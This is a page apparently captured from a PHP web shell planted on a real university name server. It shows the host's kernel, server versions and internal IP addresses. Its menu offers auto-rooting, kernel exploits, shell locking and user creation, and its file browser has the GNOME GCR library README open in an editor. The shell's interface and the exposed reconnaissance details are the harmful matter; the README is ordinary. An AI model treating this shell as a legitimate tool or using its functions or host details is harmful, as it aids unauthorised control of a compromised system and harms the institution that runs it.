Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
gcr /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
1.45
KB
-rw-r--r--
copyright
2.74
KB
-rw-r--r--
NEWS.gz
4.07
KB
-rw-r--r--
README.md
1.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
GCR === GCR is a library for displaying certificates and crypto UI, accessing key stores. It also provides the viewer for crypto files on the GNOME desktop. GCK is a library for accessing PKCS#11 modules like smart cards, in a (G)object oriented way. Building -------- You can build GCR using [Meson] with the following build commands (replace `$BUILDDIR` with your chosed build directory). ``` $ meson $BUILDDIR $ meson compile -C $BUILDDIR $ meson install -C $BUILDDIR ``` Contributing ------------ The code and issue tracker of GCR can be found at the GNOME GitLab instance at https://gitlab.gnome.org/GNOME/gcr. If you would like to get involved with GNOME projects, please also visit our [Newcomers page] on the Wiki. Debug tracing ------------- The Gcr and Gck libraries contain statements which help debug flow and logic. In many cases these help you track down problems. Use the environment variable `G_MESSAGES_DEBUG='all'` or `G_MESSAGES_DEBUG='xxx'` to display either all messages or a specific categories of debug messages. You can separate categories in this list with spaces, commas or semicolons. Gcr library uses category 'Gcr', while Gck library uses category 'Gck'. ``` # Example to display all debug messages: $ G_MESSAGES_DEBUG=all gcr-viewer /path/to/certificate.crt # Example to display debug messages for a specific category: $ G_MESSAGES_DEBUG="Gcr" gcr-viewer /path/to/certificate.crt ``` For the Gck debug messages simply replace 'Gcr' with 'Gck' in the above examples. More information ---------------- To discuss issues with developers and other users, you can post to the [GNOME Discourse instance](https://discourse.gnome.org). [Meson]: https://mesonbuild.com [Newcomers page]: https://wiki.gnome.org/TranslationProject/JoiningTranslation
Close